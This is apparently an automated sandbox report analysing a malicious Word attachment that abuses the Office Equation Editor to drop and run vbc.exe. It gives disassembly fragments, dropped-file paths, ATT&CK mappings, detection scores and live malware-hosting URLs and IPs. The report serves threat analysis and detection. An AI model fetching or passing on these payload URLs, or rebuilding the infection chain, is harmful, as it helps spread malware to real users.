Source: C:\Users\Public\vbc.exe	Code function: 9_2_03695919 pushfd ; retf	9_2_03695981
Source: C:\Users\Public\vbc.exe	Code function: 9_2_0369111B push esi; ret	9_2_0369111C
Source: C:\Users\Public\vbc.exe	Code function: 9_2_036949EF pushad ; iretd	9_2_03694A06
Source: C:\Users\Public\vbc.exe	Code function: 9_2_03696BD2 push 910F868Eh; ret	9_2_03696C30
Source: C:\Users\Public\vbc.exe	Code function: 9_2_03696BA9 push 910F868Eh; ret	9_2_03696C30
Source: C:\Users\Public\vbc.exe	Code function: 9_2_036959A1 pushfd ; retf	9_2_03695981
Source: C:\Users\Public\vbc.exe	Code function: 9_2_03692C74 push edx; retf	9_2_03692CCC
Source: C:\Users\Public\vbc.exe	Code function: 9_2_03696C4F push 910F868Eh; ret	9_2_03696C30
Source: C:\Users\Public\vbc.exe	Code function: 9_2_03692C14 push edx; retf	9_2_03692CCC
Source: C:\Users\Public\vbc.exe	Code function: 9_2_03694ECB push eax; iretd	9_2_03694ECC
Source: C:\Users\Public\vbc.exe	Code function: 9_2_036950CB push esi; retf	9_2_036950CC
Source: C:\Users\Public\vbc.exe	Code function: 9_2_03693CD9 push CACC293Ch; retf	9_2_03693CE4
Source: C:\Users\Public\vbc.exe	Code function: 9_2_03695EB5 push D0CC293Ch; retf	9_2_03695EC0
Source: C:\Users\Public\vbc.exe	Code function: 9_2_03692C99 push edx; retf	9_2_03692CCC

Source: secur32.dll.9.dr

Static PE information: section name: .didat

Source: C:\Users\Public\vbc.exe

Code function: 9_2_73281BFF GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,

9_2_73281BFF

Source: secur32.dll.9.dr

Static PE information: 0xAEC0B68B [Mon Nov 27 15:00:27 2062 UTC]

Persistence and Installation Behavior

Contains an external reference to another file

Source: webSettings.xml.rels

Extracted files from sample: https://onebztip.club/index.php/x

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\vbc[1].exe	Jump to dropped file
Source: C:\Users\Public\vbc.exe	File created: C:\Users\user\AppData\Local\Temp\sxsstore.dll	Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\vbc.exe	Jump to dropped file
Source: C:\Users\Public\vbc.exe	File created: C:\Users\user\AppData\Local\Temp\nsv7B0.tmp\System.dll	Jump to dropped file
Source: C:\Users\Public\vbc.exe	File created: C:\Users\user\AppData\Local\Temp\secur32.dll	Jump to dropped file

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\Public\vbc.exe

Jump to dropped file

Boot Survival

Drops PE files to the user root directory

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\Public\vbc.exe

Jump to dropped file

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2532

Thread sleep time: -420000s >= -30000s

Jump to behavior

Source: C:\Users\Public\vbc.exe

Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\sxsstore.dll

Jump to dropped file

Source: C:\Users\Public\vbc.exe

Code function: 9_2_03699366 rdtsc

9_2_03699366

Source: C:\Users\Public\vbc.exe	Code function: 9_2_00405C49 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	9_2_00405C49
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00406873 FindFirstFileW,FindClose,	9_2_00406873
Source: C:\Users\Public\vbc.exe	Code function: 9_2_0040290B FindFirstFileW,	9_2_0040290B

Source: C:\Users\Public\vbc.exe	API call chain: ExitProcess graph end node			graph_9-7477
Source: C:\Users\Public\vbc.exe	API call chain: ExitProcess graph end node			graph_9-7633

Source: vbc.exe, 00000009.00000002.722175818.0000000000264000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]

Source: C:\Users\Public\vbc.exe

Code function: 9_2_73281BFF GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,

9_2_73281BFF

Source: C:\Users\Public\vbc.exe

Code function: 9_2_03699366 rdtsc

9_2_03699366

Source: C:\Users\Public\vbc.exe	Code function: 9_2_03699128 mov eax, dword ptr fs:[00000030h]	9_2_03699128
Source: C:\Users\Public\vbc.exe	Code function: 9_2_0369C501 mov eax, dword ptr fs:[00000030h]	9_2_0369C501
Source: C:\Users\Public\vbc.exe	Code function: 9_2_0369DAF1 mov eax, dword ptr fs:[00000030h]	9_2_0369DAF1
Source: C:\Users\Public\vbc.exe	Code function: 9_2_0369CAD3 mov eax, dword ptr fs:[00000030h]	9_2_0369CAD3

Source: C:\Users\Public\vbc.exe

Code function: 9_2_0369EF3F RtlAddVectoredExceptionHandler,

9_2_0369EF3F

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Process created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"

Jump to behavior

Source: C:\Users\Public\vbc.exe

9_2_0040352D

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	1 Native API	Path Interception	1 Access Token Manipulation	111 Masquerading	OS Credential Dumping	11 Security Software Discovery	Remote Services	1 Archive Collected Data	Exfiltration Over Other Network Medium	11 Encrypted Channel	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	1 System Shutdown/Reboot
Default Accounts	13 Exploitation for Client Execution	Boot or Logon Initialization Scripts	11 Process Injection	1 Virtualization/Sandbox Evasion	LSASS Memory	1 Virtualization/Sandbox Evasion	Remote Desktop Protocol	1 Clipboard Data	Exfiltration Over Bluetooth	12 Ingress Tool Transfer	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	1 Access Token Manipulation	Security Account Manager	1 Remote System Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	2 Non-Application Layer Protocol	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	11 Process Injection	NTDS	2 File and Directory Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	123 Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	1 Obfuscated Files or Information	LSA Secrets	4 System Information Discovery	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	1 Timestomp	Cached Domain Credentials	System Owner/User Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
PO-AWE9934.docx	27%	Virustotal		Browse
PO-AWE9934.docx	16%	ReversingLabs	Document-Office.Exploit.CVE-2017-0199

Dropped Files

Source	Detection	Scanner	Link
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{95D87E15-AC65-4DDD-9F50-9A36A5790D0B}.tmp	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\nsv7B0.tmp\System.dll	0%	Metadefender	Browse
C:\Users\user\AppData\Local\Temp\nsv7B0.tmp\System.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\secur32.dll	0%	Metadefender	Browse
C:\Users\user\AppData\Local\Temp\secur32.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\sxsstore.dll	0%	Metadefender	Browse
C:\Users\user\AppData\Local\Temp\sxsstore.dll	0%	ReversingLabs

Unpacked PE Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label	Link
https://www.konutmarket.com/2022file_iz	0%	Avira URL Cloud	safe
https://onebztip.club/index.php/x	0%	Virustotal		Browse
https://onebztip.club/index.php/x	0%	Avira URL Cloud	safe
http://107.172.93.32/invoice/	0%	Avira URL Cloud	safe
http://107.172.93.32/invoice/dhl_shp.wbk	100%	Avira URL Cloud	malware
http://107.172.93.32/309/vbc.exe	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
onebztip.club	66.29.141.207	true	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://www.konutmarket.com/2022file_iz	true	Avira URL Cloud: safe	unknown
https://onebztip.club/index.php/x	true	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://107.172.93.32/invoice/dhl_shp.wbk	true	Avira URL Cloud: malware	unknown
http://107.172.93.32/309/vbc.exe	true	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://nsis.sf.net/NSIS_ErrorError	vbc.exe, 00000009.00000002.722216855.000000000040A000.00000004.00000001.01000000.00000003.sdmp, vbc.exe, 00000009.00000000.453547212.000000000040A000.00000008.00000001.01000000.00000003.sdmp, vbc[1].exe.7.dr, vbc.exe.7.dr	false		high
http://107.172.93.32/invoice/	invoice on 107.172.93.32.url.0.dr	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
66.29.141.207	onebztip.club	United States		19538	ADVANTAGECOMUS	true
107.172.93.32	unknown	United States		36352	AS-COLOCROSSINGUS	false

General Information

Joe Sandbox Version:	34.0.0 Boulder Opal
Analysis ID:	562071
Start date:	28.01.2022
Start time:	11:25:11
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 6m 33s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	PO-AWE9934.docx
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed:	13
Number of new started drivers analysed:	1
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.expl.evad.winDOCX@4/26@13/2
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 36.7% (good quality ratio 36.1%) Quality average: 86.8% Quality standard deviation: 21.2%
HCA Information:	Successful, ratio: 100% Number of executed functions: 35 Number of non-executed functions: 43
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .docx Found Word or Excel or PowerPoint or XPS Viewer Attach to Office via COM Scroll down Close Viewer

Warnings

Exclude process from analysis (whitelisted): mrxdav.sys, dllhost.exe, rundll32.exe, WMIADAP.exe, svchost.exe
Report size getting too big, too many NtDeviceIoControlFile calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.

Simulations

Behavior and APIs

Time	Type	Description
11:25:38	API Interceptor	55x Sleep call for process: EQNEDT32.EXE modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
107.172.93.32	Bank Details.xlsx	Get hash	malicious	Browse	107.172.93.32/00778/vbc.exe
	11882.xlsx	Get hash	malicious	Browse	107.172.93.32/11882/vbc.exe
	0789.xlsx	Get hash	malicious	Browse	107.172.93.32/0789/vbc.exe
	Notification.xlsx	Get hash	malicious	Browse	107.172.93.32/winx/vbc.exe
	Payment Advice.xlsx	Get hash	malicious	Browse	107.172.93.32/zzz/vbc.exe
	SOA Swift.xlsx	Get hash	malicious	Browse	107.172.93.32/wins/vbc.exe

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
ADVANTAGECOMUS	3FB154482EF8AE49941C9ED13063294CD4F97E28E5DD8.exe	Get hash	malicious	Browse	66.29.135.248
	3D41425DAA1E1844BE0539723042DC532A640E5BA9EF9.exe	Get hash	malicious	Browse	66.29.135.248
	westpac slip.rtf	Get hash	malicious	Browse	66.29.132.82
	ATT31313.htm	Get hash	malicious	Browse	66.29.155.118
	ATT72035.htm	Get hash	malicious	Browse	66.29.155.118
	Invoice_xls.exe	Get hash	malicious	Browse	66.29.155.108
	1q7zDeRno7.exe	Get hash	malicious	Browse	66.29.140.185
	DB_aa8484640hdgd_Maersk_Cancellation_Notice.vbs	Get hash	malicious	Browse	66.29.133.208
	muma.exe	Get hash	malicious	Browse	66.29.141.206
	SW0P9o9ksjpBsnr.exe	Get hash	malicious	Browse	66.29.159.53
	DHL_AWB_NO#9078538809022.exe	Get hash	malicious	Browse	66.29.141.56
	SecuriteInfo.com.Trojan.PWS.Siggen3.7997.5410.exe	Get hash	malicious	Browse	66.29.141.227
	12152021-lenglish@shb.com_1105 AM65Application.HTM	Get hash	malicious	Browse	66.29.141.224
	Nvbcontracting.comVQJG0MNXDU.htm	Get hash	malicious	Browse	66.29.132.79
	PO 212RC048.doc	Get hash	malicious	Browse	66.29.131.146
	17425996.exe	Get hash	malicious	Browse	66.29.140.185
	justifika Payment details.exe	Get hash	malicious	Browse	66.29.132.124
	5.exe	Get hash	malicious	Browse	66.29.159.53
	Na77FGlkz5.exe	Get hash	malicious	Browse	66.29.151.252
	xxTzyGLZx5.exe	Get hash	malicious	Browse	66.29.159.53
AS-COLOCROSSINGUS	NEW ORDER.xlsx	Get hash	malicious	Browse	192.3.245.208
	QUOTATION REQUEST - SUPPLY OF PRODUCTS - DTD JANUARY 2022PDF.xlsx	Get hash	malicious	Browse	107.173.191.82
	_Purchase Order_00523_.xlsx	Get hash	malicious	Browse	198.46.132.195
	110#U5e74#U5ea6#U6263#U7e73#U6191#U55ae.xlsx	Get hash	malicious	Browse	198.12.110.181
	x86	Get hash	malicious	Browse	107.172.141.186
	SCAN_SHIPPING_DOCUMENTS.xlsx	Get hash	malicious	Browse	192.210.219.13
	Valmont Orders.xlsx	Get hash	malicious	Browse	23.95.122.118
	PI 01.xlsx	Get hash	malicious	Browse	107.173.229.131
	SWIFT Message.xlsx	Get hash	malicious	Browse	107.174.138.158
	SSH.mpsl	Get hash	malicious	Browse	104.170.106.80
	QuotePDF.vbs	Get hash	malicious	Browse	172.245.94.220
	Payment Slip#438430.xlsx	Get hash	malicious	Browse	107.172.76.132
	STATEMENT OF ACCOUNT.xlsx	Get hash	malicious	Browse	107.172.76.210
	e-pda 0003000009011.xlsx	Get hash	malicious	Browse	198.12.107.201
	RFQ 202200153149 .xlsx	Get hash	malicious	Browse	192.3.180.39
	WP21BZ059.xlsx	Get hash	malicious	Browse	198.12.127.206
	MSC INVOICE(S).xlsx	Get hash	malicious	Browse	23.95.122.118
	i.arm4	Get hash	malicious	Browse	23.94.138.109
	i.arm5	Get hash	malicious	Browse	23.94.138.109
	lUkTchBi9r.rtf	Get hash	malicious	Browse	172.245.119.43

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
05af1f5ca1b87cc9cc9b25185115607d	q5HvnqyamG.xls	Get hash	malicious	Browse	66.29.141.207
	zqF4FsvaXO.xls	Get hash	malicious	Browse	66.29.141.207
	84258386558.xlsm	Get hash	malicious	Browse	66.29.141.207
	Invoice.xls	Get hash	malicious	Browse	66.29.141.207
	xhsI-690.xls	Get hash	malicious	Browse	66.29.141.207
	Technical Specification.doc	Get hash	malicious	Browse	66.29.141.207
	SPECIFICATION.doc	Get hash	malicious	Browse	66.29.141.207
	252199835184030.xlsm	Get hash	malicious	Browse	66.29.141.207
	Quotation Ref S2692.doc	Get hash	malicious	Browse	66.29.141.207
	Order For Fitness Equipment specifications.doc	Get hash	malicious	Browse	66.29.141.207
	290091332850986.xlsm	Get hash	malicious	Browse	66.29.141.207
	imedpub.com.xls	Get hash	malicious	Browse	66.29.141.207
	Invoice.xls	Get hash	malicious	Browse	66.29.141.207
	Inv WW-7328.xls	Get hash	malicious	Browse	66.29.141.207
	imedpub.com.xls	Get hash	malicious	Browse	66.29.141.207
	Omics Journal.xls	Get hash	malicious	Browse	66.29.141.207
	OMICS Online.xls	Get hash	malicious	Browse	66.29.141.207
	Opast Publishing Group.xls	Get hash	malicious	Browse	66.29.141.207
	iMedPub LTD.xls	Get hash	malicious	Browse	66.29.141.207
	imedpub.xls	Get hash	malicious	Browse	66.29.141.207
7dcce5b76c8b17472d024758970a406b	DHLAWB503900.xls	Get hash	malicious	Browse	66.29.141.207
	00840082.xls	Get hash	malicious	Browse	66.29.141.207
	Payment Details.doc	Get hash	malicious	Browse	66.29.141.207
	1-27-2022.xlsx	Get hash	malicious	Browse	66.29.141.207
	PO25012022.ppam	Get hash	malicious	Browse	66.29.141.207
	PO25012022.ppam	Get hash	malicious	Browse	66.29.141.207
	Quote221.doc	Get hash	malicious	Browse	66.29.141.207
	GMC_24012022.doc	Get hash	malicious	Browse	66.29.141.207
	VC_DRAFT PI_1110106.docx	Get hash	malicious	Browse	66.29.141.207
	ND-1840625051.xlsb	Get hash	malicious	Browse	66.29.141.207
	42312SIP-6864.xlsm	Get hash	malicious	Browse	66.29.141.207
	PO20220126.doc	Get hash	malicious	Browse	66.29.141.207
	PO 2463826 .doc	Get hash	malicious	Browse	66.29.141.207
	SHIPPPING-DOC.xlsx	Get hash	malicious	Browse	66.29.141.207
	ND-1823002851.xlsb	Get hash	malicious	Browse	66.29.141.207
	NK-1480848469.xlsb	Get hash	malicious	Browse	66.29.141.207
	NK-1480848469.xlsb	Get hash	malicious	Browse	66.29.141.207
	00102909.xls	Get hash	malicious	Browse	66.29.141.207
	sample20220126-01.xls	Get hash	malicious	Browse	66.29.141.207
	NK-1706548667.xlsb	Get hash	malicious	Browse	66.29.141.207

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Link
C:\Users\user\AppData\Local\Temp\nsv7B0.tmp\System.dll	C9k458CPpv.exe	Get hash	malicious	Browse
	9u4xTDR5bG.exe	Get hash	malicious	Browse
	b4#Uc6a9.exe	Get hash	malicious	Browse
	9u4xTDR5bG.exe	Get hash	malicious	Browse
	lUkTchBi9r.rtf	Get hash	malicious	Browse
	A3hamzfUkW.rtf	Get hash	malicious	Browse
	7027521.xlsx	Get hash	malicious	Browse
	SdEkI4IDqd.exe	Get hash	malicious	Browse
	SdEkI4IDqd.exe	Get hash	malicious	Browse
	cP5nXH8fQI.exe	Get hash	malicious	Browse
	cP5nXH8fQI.exe	Get hash	malicious	Browse
	BL Copy.doc	Get hash	malicious	Browse
	jqkuxbwi.exe	Get hash	malicious	Browse
	HealthSystray.exe	Get hash	malicious	Browse
	jqkuxbwi.exe	Get hash	malicious	Browse
	listing new.xlsx	Get hash	malicious	Browse
	Pnportd65.exe	Get hash	malicious	Browse
	Pnportd65.exe	Get hash	malicious	Browse
	PO-C - 20211213-PLATE.doc	Get hash	malicious	Browse
	new.xlsx	Get hash	malicious	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-CNRY.FSD

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	131072
